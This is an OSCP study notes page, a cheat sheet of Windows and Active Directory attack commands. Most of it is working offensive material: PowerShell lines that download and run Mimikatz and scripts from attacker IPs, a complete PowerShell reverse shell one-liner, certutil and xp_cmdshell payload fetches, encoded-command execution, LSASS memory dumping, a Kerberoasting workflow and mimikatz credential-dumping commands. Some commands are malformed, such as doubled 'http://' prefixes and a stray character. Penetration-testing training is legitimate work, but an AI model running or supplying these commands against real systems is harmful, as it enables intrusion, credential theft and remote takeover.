O
O
OSCP Notes
Search…
Windows hacks
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"

Download files with powershell:

On Web shell:
IEX (New-Object Net.WebClient).downloadString('
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
')
powershell IEX(New-Object Net.WebClient).DownloadFile('http://http://192.168.49.164/gori.ps1')
powershell IEX(New-Object Net.WebClient).downloadString('http://http://192.168.119.181/gori.ps1')
Transfer mimikatz to a Temp directory:
(New-Object Net.WebClient).DownloadFile("http://192.168.119.181:8080/mimikatz.exe","C:\Windows\Temp\mimikatz.exe")
certutil -urlcache -split -f http://192.168.119.212:80/tcp_power.ps1 C:\backup\Scripts\backup_powershell.ps1
\
powershell IEX(New-Object Net.WebClient).DownloadFile("http://192.168.119.188:8000/mimikatz.exe"),"C:\Windows\Users\Bethany\Documents\mimikatz.exe"
powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.119.146/newkb.ps1");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://192.168.119.146:8080/stable.ps1\");"

Get-NetDomain -Domain xor.com

$cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)

Cool Reverse shell Trick:

reverse shell not working???
To mitigate bad character issue on the reverse shell (ps1), we can first convert everything into UTF-16LE (This is how windows programs are constructed) and base64 encode it.
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
this is converting UTF to little indian format > then base64
copy the input and use it to execute command
powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS

If mimikatz is not working try different versions! (i.e) 2.1

mimikatz2.1.1/mimikatz_trunk.zip at master · caday00/mimikatz2.1.1
GitHub

Dumping Isass

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
PNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full

Active Directory Workflow (Case Study 1)

1.Obtain SPN data with GetSPN.ps1 (Take notes on Service names and domain info)
2. copy nc.exe to the windows machine and get a reverse shell back(stable)
3. Once stable,
open powershell and do
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"
4. open up mimikatz.(make sure you have the right version for the os ----> 32bit/64)
and dump kerbero tickets
kerberos::list /export
this should dump all the tickets and results will be saved into the victim's computer.
5. Copy the file over to the kali and make it to hashcat form with kirbi2johnn.py
Cracking a ticket:
python3 /home/kali/Downloads/kerberoast-master/tgsrepcrack.py ~/rockyou.txt kirby.kirby
6. Once cracked you can try to login to the account with evilrm (use the service name you obtained from the step 1)
❯ ./evil-winrm.rb -i IP -u User -p PASS

look for plaintext passwords

Mimikatz console (multiple commands)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
# lsadump::sam
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
mimikatz cheatsheet:
PayloadsAllTheThings/Windows - Mimikatz.md at master · swisskyrepo/PayloadsAllTheThings
GitHub
and psexec.py /evilwinrm to getin to the admin shell.
Copy link
Outline
Download files with powershell:
Get-NetDomain -Domain xor.com
Cool Reverse shell Trick: